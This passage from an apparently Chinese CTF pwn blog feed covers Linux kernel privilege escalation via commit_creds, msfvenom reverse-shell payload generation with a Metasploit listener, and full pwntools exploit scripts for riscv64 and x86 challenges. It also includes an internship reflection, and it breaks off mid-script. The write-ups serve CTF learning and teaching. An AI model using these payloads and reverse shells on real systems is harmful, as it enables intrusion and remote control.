assumed request_key authority */</span><br><span class="hljs-meta">#<span class="hljs-keyword">endif</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">ifdef</span> CONFIG_SECURITY</span><br> <span class="hljs-type">void</span> *security; <span class="hljs-comment">/* subjective LSM security */</span><br><span class="hljs-meta">#<span class="hljs-keyword">endif</span></span><br> <span class="hljs-keyword">struct</span> <span class="hljs-title class_">user_struct</span> *user; <span class="hljs-comment">/* real user ID subscription */</span><br> <span class="hljs-keyword">struct</span> <span class="hljs-title class_">user_namespace</span> *user_ns; <span class="hljs-comment">/* user_ns the caps and keyrings are relative to. */</span><br> <span class="hljs-keyword">struct</span> <span class="hljs-title class_">group_info</span> *group_info; <span class="hljs-comment">/* supplementary groups for euid/fsgid */</span><br> <span class="hljs-keyword">struct</span> <span class="hljs-title class_">rcu_head</span> rcu; <span class="hljs-comment">/* RCU deletion hook */</span><br>} __randomize_layout;<br></code></pre></td></tr></table></figure><h1 id="内核态函数"><a href="#内核态函数" class="headerlink" title="内核态函数"></a><strong>内核态函数</strong></h1><p>相比用户态库函数,内核态的函数有了一些变化</p><ul><li>printf() -> **printk()**,但需要注意的是 printk() 不一定会把内容显示到终端上,但一定在内核缓冲区里,可以通过 dmesg 查看效果</li><li>memcpy() -> <strong>copy_from_user()/copy_to_user()</strong><ul><li>copy_from_user() 实现了将用户空间的数据传送到内核空间</li><li>copy_to_user() 实现了将内核空间的数据传送到用户空间</li></ul></li><li>malloc() -> **kmalloc()**,内核态的内存分配函数,和 malloc() 相似,但使用的是 slab/slub 分配器</li><li>free() -> **kfree()**,同 kmalloc()</li></ul><p>另外要注意的是,kernel 管理进程,因此 kernel 也记录了进程的权限。kernel 中有两个可以方便的改变权限的函数:</p><ul><li>*<em>int commit_creds(struct cred <em>new)</em></em></li><li><em><em>struct cred</em> prepare_kernel_cred(struct task_struct</em> daemon)**</li></ul><p>从函数名也可以看出,执行 commit_creds(prepare_kernel_cred(0)) 即可获得 root 权限,0 表示 以 0 号进程作为参考准备新的 credentials。<br>更多关于 prepare_kernel_cred 的信息可以参考 <a href="https://elixir.bootlin.com/linux/v4.6/source/kernel/cred.c#L594">源码</a><br>执行 commit_creds(prepare_kernel_cred(0)) 也是最常用的提权手段,两个函数的地址都可以在 /proc/kallsyms 中查看(较老的内核版本中是 /proc/ksyms)。</p><figure class="highlight tcl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs tcl">post sudo grep commit_creds /<span class="hljs-keyword">proc</span>/kallsyms<br>[sudo]<span class="hljs-title"> m4x</span> 的密码:<span class="hljs-title"></span><br><span class="hljs-title">ffffffffbb6af9e0</span> T<span class="hljs-title"> commit_creds</span><br>ffffffffbc7cb3d0<span class="hljs-title"> r</span> __ksymtab_commit_creds<span class="hljs-title"></span><br><span class="hljs-title">ffffffffbc7f06fe</span> r<span class="hljs-title"> __kstrtab_commit_creds</span><br>post<span class="hljs-title"> sudo</span> grep<span class="hljs-title"> prepare_kernel_cred</span> /<span class="hljs-keyword">proc</span>/kallsyms<span class="hljs-title"></span><br><span class="hljs-title">ffffffffbb6afd90</span> T<span class="hljs-title"> prepare_kernel_cred</span><br>ffffffffbc7d4f20<span class="hljs-title"> r</span> __ksymtab_prepare_kernel_cred<span class="hljs-title"></span><br><span class="hljs-title">ffffffffbc7f06b7</span> r<span class="hljs-title"> __kstrtab_prepare_kernel_cred</span><br></code></pre></td></tr></table></figure><p>一般情况下,/proc/kallsyms 的内容需要 root 权限才能查看<br>所以在更改init文件时,需要更改权限为root以便调试获取基址等内容</p><h1 id="CTF-kernel-pwn-相关"><a href="#CTF-kernel-pwn-相关" class="headerlink" title="CTF kernel pwn 相关"></a><strong>CTF kernel pwn 相关</strong></h1><p>一般会给以下三个文件</p><ol><li>boot.sh: 一个用于启动 kernel 的 shell 的脚本,多用 qemu,保护措施与 qemu 不同的启动参数有关</li><li>bzImage: kernel binary</li><li>rootfs.cpio: 文件系统映像</li></ol><p>比如:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs bash">youlin@youlin-virtual-machine:~/kernel/qwb2018-core/give_to_player$ <span class="hljs-built_in">ls</span><br>bzImage core core.cpio core.ko exp exp.c g1 g2 start.sh vmlinux<br>youlin@youlin-virtual-machine:~/kernel/qwb2018-core/give_to_player$ file vmlinux<br>vmlinux: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=1d8344e71a82bc43821029796ef65bebfe8e65c3, not stripped<br>youlin@youlin-virtual-machine:~/kernel/qwb2018-core/give_to_player$ file bzImage<br>bzImage: Linux kernel x86 boot executable bzImage, version 4.15.8 (simple@vps-simple) <span class="hljs-comment">#19 SMP Mon Mar 19 18:50:28 CST 2018, RO-rootFS, swap_dev 0X6, Normal VGA</span><br>youlin@youlin-virtual-machine:~/kernel/qwb2018-core/give_to_player$ <span class="hljs-built_in">cat</span> start.sh<br>qemu-system-x86_64 \<br>-m 128M \<br>-kernel ./bzImage \<br>-initrd ./core.cpio \<br>-append <span class="hljs-string">"root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr"</span> \<br>-s \<br>-netdev user,<span class="hljs-built_in">id</span>=t0, -device e1000,netdev=t0,<span class="hljs-built_in">id</span>=nic0 \<br>-nographic \<br><br></code></pre></td></tr></table></figure><ol><li>解释一下 qemu 启动的参数:<ul><li>initrd rootfs.cpio,使用 rootfs.cpio 作为内核启动的文件系统</li><li>kernel ./bzImage,使用 bzImage 作为 kernel 映像</li><li>cpu kvm64,+smep,设置 CPU 的安全选项,这里开启了 smep</li><li>m 64M,设置虚拟 RAM 为 64M,默认为 128M 其他的选项可以通过 –help 查看。</li></ul></li><li>本地写好 exploit 后,可以通过 base64 编码等方式把编译好的二进制文件保存到远程目录下,进而拿到 flag。同时可以使用 musl, uclibc 等方法减小 exploit 的体积方便传输。(这里注意kernel的exp不再是拿python写了,而是c语言编写exp)</li></ol>]]></content>
</entry>
<entry>
<title>技巧记录</title>
<link href="/2023/09/25/%E6%8A%80%E5%B7%A7%E8%AE%B0%E5%BD%95/"/>
<url>/2023/09/25/%E6%8A%80%E5%B7%A7%E8%AE%B0%E5%BD%95/</url>
<content type="html"><![CDATA[<h1 id="VMware每次重启共享文件夹失效"><a href="#VMware每次重启共享文件夹失效" class="headerlink" title="VMware每次重启共享文件夹失效"></a>VMware每次重启共享文件夹失效</h1><p>主要原因是在linux系统启动时vmhgfs-fuse不会启动。</p><p>最简单的办法是在共享文件夹设置中禁用,再启用。但是太麻烦了。</p><p>直接在fstab文件系统表中添加一个条目即可。编辑/etc/fstab在最下面添加一行。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">vmhgfs-fuse /mnt/hgfs fuse defaults,allow_other <span class="hljs-number">0</span> <span class="hljs-number">0</span><br></code></pre></td></tr></table></figure><h1 id="固件解包网站"><a href="#固件解包网站" class="headerlink" title="固件解包网站"></a>固件解包网站</h1><p><a href="https://zhiwanyuzhou.com/multiple_analyse/firmware/">https://zhiwanyuzhou.com/multiple_analyse/firmware/</a></p><h1 id="pip-install安装包代理"><a href="#pip-install安装包代理" class="headerlink" title="pip install安装包代理"></a>pip install安装包代理</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">pip install angr -i https://pypi.tuna.tsinghua.edu.cn/simple<br></code></pre></td></tr></table></figure><h1 id="异构内核文件系统下载"><a href="#异构内核文件系统下载" class="headerlink" title="异构内核文件系统下载"></a>异构内核文件系统下载</h1><p><a href="https://people.debian.org/~aurel32/qemu/">https://people.debian.org/~aurel32/qemu/</a></p><h1 id="docker-stop显示权限不足"><a href="#docker-stop显示权限不足" class="headerlink" title="docker stop显示权限不足"></a>docker stop显示权限不足</h1><p>输入下面指令再进行stop就可以了</p><figure class="highlight maxima"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs maxima">sudo aa-<span class="hljs-built_in">remove</span>-<span class="hljs-literal">unknown</span><br></code></pre></td></tr></table></figure><h1 id="异构反弹shell的shellcode生成"><a href="#异构反弹shell的shellcode生成" class="headerlink" title="异构反弹shell的shellcode生成"></a>异构反弹shell的shellcode生成</h1><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">msfvenom --format python --payload linux/mipsle/shell_reverse_tcp <span class="hljs-attribute">LHOST</span>=192.168.182.131 <span class="hljs-attribute">LPORT</span>=8888<br></code></pre></td></tr></table></figure><p>以python的形式打印出来</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403181755391.png" alt="image-20240318175539273"></p><h1 id="iot反弹shell马生成"><a href="#iot反弹shell马生成" class="headerlink" title="iot反弹shell马生成"></a>iot反弹shell马生成</h1><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">msfvenom -p linux/mipsle/meterpreter/reverse_tcp <span class="hljs-attribute">LHOST</span>=192.168.182.137 <span class="hljs-attribute">LPORT</span>=8888 -f elf > msf<br></code></pre></td></tr></table></figure><p>使用python起一个http服务,然后使用wget将生成的木马传输进本地</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">python -m http.server<br></code></pre></td></tr></table></figure><p>然后先使用msfconsole监听端口</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs plain">msfconsole<br>use exploit/multi/handler<br>set payload linux/mipsle/meterpreter/reverse_tcp<br>set LHOST 192.168.0.12<br>set LPORT 8888<br>run<br></code></pre></td></tr></table></figure><p>然后运行一下就会弹shell了,同时也可以进行文件传输了</p><p><img src="https://cdn.nlark.com/yuque/0/2023/png/26443359/1698750389758-63b9cdb6-93df-4e61-9387-778fac9356af.png" alt="img"></p><p><img src="https://cdn.nlark.com/yuque/0/2023/png/26443359/1698750403732-012e85c5-c718-4e6d-ac2a-864300d960fc.png" alt="img"></p>]]></content>
</entry>
<entry>
<title>riscv64调试记录</title>
<link href="/2023/09/25/riscv64%E8%B0%83%E8%AF%95%E8%AE%B0%E5%BD%95/"/>
<url>/2023/09/25/riscv64%E8%B0%83%E8%AF%95%E8%AE%B0%E5%BD%95/</url>
<content type="html"><![CDATA[<h1 id="risky-login"><a href="#risky-login" class="headerlink" title="risky_login"></a><strong>risky_login</strong></h1><p>题目本身并没有什么难度,由于IDA对riscv64架构并不支持反编译查看伪代码,所以本题使用ghidra进行逆向</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252028514.png"></p><p>在FUN_12345786函数中存在明显的栈溢出,但是需要绕过</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-number">8</span> < (byte)sVar1<br></code></pre></td></tr></table></figure><p>这里有一个很明显的类型混淆,使用gpt搜索发现byte的范围是0-0xff,而size要比这大很多,所以有个比较明显的整数溢出,当param_1的长度大于等于0x100且小于0x108时可以满足这个条件。</p><p>并且本题存在后门函数</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252042353.png"></p><p>大概可以猜测出本题本题溢出长度就为0x100,然后就是绕过后门函数当中的过滤了,这里使用*自动补全就可以实现了</p><p>exp:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br>banary = <span class="hljs-string">"./pwn"</span><br>elf = ELF(banary)<br>libc = ELF(<span class="hljs-string">"./libc.so.6"</span>)<br><span class="hljs-comment">#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")</span><br>ip = <span class="hljs-string">'tcp.cloud.dasctf.com'</span><br>port = <span class="hljs-number">28250</span><br>local = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> local:<br><span class="hljs-comment"># io = process(["qemu-riscv64-static","-L","/usr/riscv64-linux-gnu/",banary])</span><br> io = process([<span class="hljs-string">"qemu-riscv64-static"</span>,<span class="hljs-string">"-L"</span>,<span class="hljs-string">"/usr/riscv64-linux-gnu/"</span>,<span class="hljs-string">"-g"</span>,<span class="hljs-string">"1234"</span>,banary])<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>():<br> gdb.attach(io)<br> pause()<br><br>s = <span class="hljs-keyword">lambda</span> data : io.send(data)<br>sl = <span class="hljs-keyword">lambda</span> data : io.sendline(data)<br>sa = <span class="hljs-keyword">lambda</span> text, data : io.sendafter(text, data)<br>sla = <span class="hljs-keyword">lambda</span> text, data : io.sendlineafter(text, data)<br>r = <span class="hljs-keyword">lambda</span> : io.recv()<br>ru = <span class="hljs-keyword">lambda</span> text : io.recvuntil(text)<br>uu32 = <span class="hljs-keyword">lambda</span> : u32(io.recvuntil(<span class="hljs-string">b"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b'\x00'</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> : u64(io.recvuntil(<span class="hljs-string">b"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b"\x00"</span>))<br>iuu32 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = <span class="hljs-keyword">lambda</span> : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b'\x00'</span>))<br>lg = <span class="hljs-keyword">lambda</span> data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, <span class="hljs-built_in">eval</span>(data)))<br>ia = <span class="hljs-keyword">lambda</span> : io.interactive()<br><br>backdoor=<span class="hljs-number">0x123456ee</span><br><br>ru(<span class="hljs-string">'Input ur name:'</span>)<br>payload=<span class="hljs-string">b'A'</span>*<span class="hljs-number">8</span><br>s(payload)<br><br>ru(<span class="hljs-string">"Input ur words"</span>)<br>payload=<span class="hljs-string">b'A'</span>.ljust(<span class="hljs-number">0x100</span>,<span class="hljs-string">b'A'</span>)+p64(backdoor)<br>s(payload)<br><br>sleep(<span class="hljs-number">0.5</span>)<br>sl(<span class="hljs-string">b'cat fl*'</span>)<br><br>ia()<br></code></pre></td></tr></table></figure><h1 id="调试技巧"><a href="#调试技巧" class="headerlink" title="调试技巧"></a>调试技巧</h1><p>其实本题并不需要调试,只需要把题目的逻辑大概都理清楚,就可以将exp写出来了。但是为了防止以后再遇到riscv64的题目,还是需要学习一下。</p><p>听z1r0师傅说pwndbg是不支持riscv64架构的调试,需要去修改源码,并且修改地方比较多(太菜了,选择放弃这种方法)</p><p>然后刚好b站上又有国资师傅讲的异构课,重新听了一遍记录下riscv64的调试过程</p><p>首先是运行riscv64程序的命令</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">qemu-riscv64-static -L /usr/riscv64-linux-gnu/ ./pwn<br></code></pre></td></tr></table></figure><p>调试命令:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">qemu-riscv64-static -L /usr/riscv64-linux-gnu/ -g <span class="hljs-number">1234</span> ./pwn<br></code></pre></td></tr></table></figure><p>然后使用gdb-multiarch连接端口进行调试</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python">gdb-multiarch pwn<br><span class="hljs-built_in">set</span> architecture riscv:rv64<br>target remote <span class="hljs-number">0.0</span><span class="hljs-number">.0</span><span class="hljs-number">.0</span>:<span class="hljs-number">1234</span><br></code></pre></td></tr></table></figure><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252038736.png" alt="image-20230925203838667"></p><p>可以看到pwndbg报错,本应该出现的信息都没有弹出来,这里只能使用gdb本身的几个命令来查看栈上的信息以及程序运行所在的地址</p><p>首先是正常下断点,将断点下在strcpy的后面</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">b *<span class="hljs-number">123457e0</span><br></code></pre></td></tr></table></figure><p>接着c过去,可以看到什么信息都没有弹出来</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252025664.png" alt="Untitled"></p><p>这里可以使用x/20i $pc,来查看程序运行到哪了</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252039624.png" alt="image-20230925203910578"></p><p>也可以用i r来查看所有寄存器的状态</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252041387.png"></p><p>使用x/40gx $sp查看此时栈上的状态</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252025823.png" alt="Untitled"></p><p>这里查看汇编,并且调试验证也可以得出本题会将sp+280处的数据给ra作为ret的返回值,并且输入点在$sp+0x18的位置处,所以可以得出溢出长度为0x100的结论。</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252025955.png" alt="Untitled"></p>]]></content>
</entry>
<entry>
<title>实习总结</title>
<link href="/2023/09/25/%E5%AE%9E%E4%B9%A0%E6%80%BB%E7%BB%93/"/>
<url>/2023/09/25/%E5%AE%9E%E4%B9%A0%E6%80%BB%E7%BB%93/</url>
<content type="html"><![CDATA[<h1 id="感想"><a href="#感想" class="headerlink" title="感想"></a>感想</h1><p>不得不感叹时间过得很快呀,不知不觉就已经大三了。去年看toka实习总结的时候好像都还没过去多久?转眼自己的大二实习都已经结束了。</p><p>还是比较幸运能够有机会来广州实习,一开始自己大二的计划是在这个暑假好好学学iot和渗透的并没有什么想法出来实习,所以也并没有把自己的简历往外投递(hhh,其实我都还没有开始写一份自己的简历)可能转折点就是5月份左右看到有师傅在群里问有没有pwn师傅有时间出题目吧,当时可能很多师傅都在准备期末考试和比赛?然后自己就揽下了这个活(这个时候就不得不感叹钱果然才是最能催促人学习的),大概一两天就把关于出pwn题的docker使用给学会了吧。然后在大概6月份的时候就问我有没有时间来广州实习,并且说是实习没有什么事,时间比较自由,最后几番拉扯最后还是过来了吧。(时间确实比较自由,两个月的上班时间绝大部分时间都是在干自己的事情)并且同事和公司氛围都还比较满意(最主要包住真的能省掉很多事情)广州这边的生活节奏貌似也要比北上深更舒服一点,哪怕是3k一个月也能比较滋润了(包住的情况下,不包住的话可能就得稍微省着点花了)</p><p>对于我来说可能真的是扩宽了眼界了吧,出来实习以前甚至江西都没出过几次,大部分时间都是待在小县城里,哪怕是大学也是在江西的某个犄角嘎达,荒郊野岭的地方,第一次在一个一线城市生活了这么久,感受一个完全不同的城市的生活习惯(广州无辣椒,我和湖南一起来的同事一致认为广州的辣椒少的可怜,绝大部分菜都是无辣味)。还很幸运的有机会到现成看了两场广州队的足球比赛(广州队的主场氛围是真的很好,哪怕是降级到了中甲你也能够看到几k个人全场90分钟时间不断的为场上的队员加油助威,遗憾的是两场比赛都没有看到广州队获得一场胜利,也没有一个进球,感觉胜利或者进球之后广州队的球迷真的能疯狂的嗨起来吧,hhh,已经被广州队迷住了希望以后还有机会到现场看广州队踢中超)</p><p>公司氛围感觉待的公司还是很不错的,小公司相对来说也要比大公司更自由一点,加班也比较少(反正我没有过,也没怎么看到过其他同事需要加班)看了其他的一些师傅们实习(特别是toka)好像几乎每天都需要加班?而且就这个公司来说的话还经常有福利偶尔会有同事请喝奶茶还有小吃,同事之间的交流也比较融洽,一起住的同事也比较好经常会请我和另外一个一起来实习的喝喝奶茶,吃饭啥的,也会和我们聊聊对这个行业的一些理解。</p><h1 id="工作内容"><a href="#工作内容" class="headerlink" title="工作内容"></a>工作内容</h1><p>找到的工作虽然说是安全岗位,其实公司给的任务其实只有CTF培训和比赛出题还有打比赛。然后其余大部分时间都是在公司自己学习(貌似对于我来说的话,学习时间要比待家里更多了,因为家里总会有各种各样的事情)幸运的是两个月时间在z1r0师傅和izeroo师傅的帮助下也算是初步掌握了挖掘路由器漏洞的一些技巧,还有在pursue师傅的一些建议下也是刷了几台vulnhub的靶机(希望这个可以一直坚持下去)</p><h1 id="总结与唠叨?"><a href="#总结与唠叨?" class="headerlink" title="总结与唠叨?"></a>总结与唠叨?</h1><p>对于从小县城走出来的我这次出来实习还是学习到了很多东西,也有了很多对这个安全行业的新的认知。也尝试了很多第一次,第一次坐飞机,第一次进京,第一次到南京(hhh,其实只是到南京转了下机)感受了下大城市的生活节奏(早晚高峰地铁是真的挤,我甚至坐的不是最多人的三号线)还有北京的小震撼,高速进京每个人都得查身份证(北京到处都查身份证,不带身份证感觉去哪都有点不方便了)。最主要的学习所得还是培训的经验吧(希望以后还能恰点这个钱)还有路由器的漏洞挖掘经验(给zer0师傅和izeroo师傅磕两个)还对渗透有了大概的一个认知(一个与CTF可以说是完全不同的方向了)</p>]]></content>
</entry>
<entry>
<title>天融信车联网CTF总结</title>
<link href="/2023/09/25/%E5%A4%A9%E8%9E%8D%E4%BF%A1%E8%BD%A6%E8%81%94%E7%BD%91CTF%E6%80%BB%E7%BB%93/"/>
<url>/2023/09/25/%E5%A4%A9%E8%9E%8D%E4%BF%A1%E8%BD%A6%E8%81%94%E7%BD%91CTF%E6%80%BB%E7%BB%93/</url>
<content type="html"><![CDATA[<h1 id="easy-guess"><a href="#easy-guess" class="headerlink" title="easy_guess"></a>easy_guess</h1><p>这道题没有什么考点,直接写随机数就行了</p><p>exp:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br>banary = <span class="hljs-string">"./easyguess"</span><br>elf = ELF(banary)<br><span class="hljs-comment">#libc = ELF("./libc.so.6")</span><br>libc=cdll.LoadLibrary(<span class="hljs-string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)<br>ip = <span class="hljs-string">'123.127.164.29'</span><br>port = <span class="hljs-number">26921</span><br>local = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>():<br> gdb.attach(io)<br> pause()<br><br>s = <span class="hljs-keyword">lambda</span> data : io.send(data)<br>sl = <span class="hljs-keyword">lambda</span> data : io.sendline(data)<br>sa = <span class="hljs-keyword">lambda</span> text, data : io.sendafter(text, data)<br>sla = <span class="hljs-keyword">lambda</span> text, data : io.sendlineafter(text, data)<br>r = <span class="hljs-keyword">lambda</span> : io.recv()<br>ru = <span class="hljs-keyword">lambda</span> text : io.recvuntil(text)<br>uu32 = <span class="hljs-keyword">lambda</span> : u32(io.recvuntil(<span class="hljs-string">b"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b'\x00'</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> : u64(io.recvuntil(<span class="hljs-string">b"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b"\x00"</span>))<br>iuu32 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = <span class="hljs-keyword">lambda</span> : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b'\x00'</span>))<br>lg = <span class="hljs-keyword">lambda</span> addr : log.info(addr)<br>ia = <span class="hljs-keyword">lambda</span> : io.interactive()<br><br>ru(<span class="hljs-string">"You have three times"</span>)<br>num=libc.rand()<br>sl(<span class="hljs-built_in">str</span>(num))<br>sleep(<span class="hljs-number">0.5</span>)<br>num1=libc.rand()<br>sl(<span class="hljs-built_in">str</span>(num1))<br>sleep(<span class="hljs-number">0.5</span>)<br>num2=libc.rand()<br>sl(<span class="hljs-built_in">str</span>(num2))<br><br>system=elf.plt[<span class="hljs-string">'system'</span>]<br>bin_sh=<span class="hljs-number">0x08049A30</span><br>ru(<span class="hljs-string">"right! You get a chance to pwn it!"</span>)<br>payload=<span class="hljs-string">b'A'</span>*<span class="hljs-number">0x1c</span>+<span class="hljs-string">b'A'</span>*<span class="hljs-number">4</span>+p32(system)+p32(<span class="hljs-number">0</span>)+p32(bin_sh)<br>sl(payload)<br>ia()<br></code></pre></td></tr></table></figure><h1 id="guess"><a href="#guess" class="headerlink" title="guess"></a>guess</h1><p>一道保护全开的栈题,利用pthread_create,修改TLS上的canary的值来绕过canary防护,在start_routine函数里面有一个很明显的gets溢出点,在猜随机数的函数里面直接使用’-’跳过输入来泄露程序基址。</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309251952494.png" alt="Untitled"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs python">ru(<span class="hljs-string">"Enter 